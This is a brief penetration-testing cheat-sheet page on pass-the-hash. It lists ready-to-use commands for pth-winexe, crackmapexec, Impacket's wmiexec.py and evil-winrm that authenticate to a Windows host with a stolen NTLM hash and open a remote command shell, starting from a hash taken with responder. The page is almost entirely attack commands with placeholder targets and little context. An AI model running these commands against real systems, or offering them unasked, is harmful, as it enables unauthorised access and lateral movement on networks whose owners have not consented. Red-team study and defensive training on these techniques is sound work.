search

Pass-the-hash

https://www.n00py.io/2020/12/alternative-ways-to-pass-the-hash-pth/

#If you manage to steal an NTLM hash with responder, authenticate with pth-winexe

#Basic usage
pth-winexe -U redcliff123iuhnd7s8fh240-gfkmjhsaf //10.10.10.10 cmd

#crackmapexec

crackmapexec smb 10.10.10.10 -u user -H BD1C6503987F8FF006296118F359FA79  -d domain.local

#Impacket

wmiexec.py domain.local/user@10.10.10.10 -hashes aad3b435b51404eeaad3b435b51404ee:BD1C6503987F8FF006296118F359FA79

#Evil-winrm

evil-winrm -i 10.10.10.10 -u user -H BD1C6503987F8FF006296118F359FA79

PreviouskerberoastingNextSysadmin

Last updated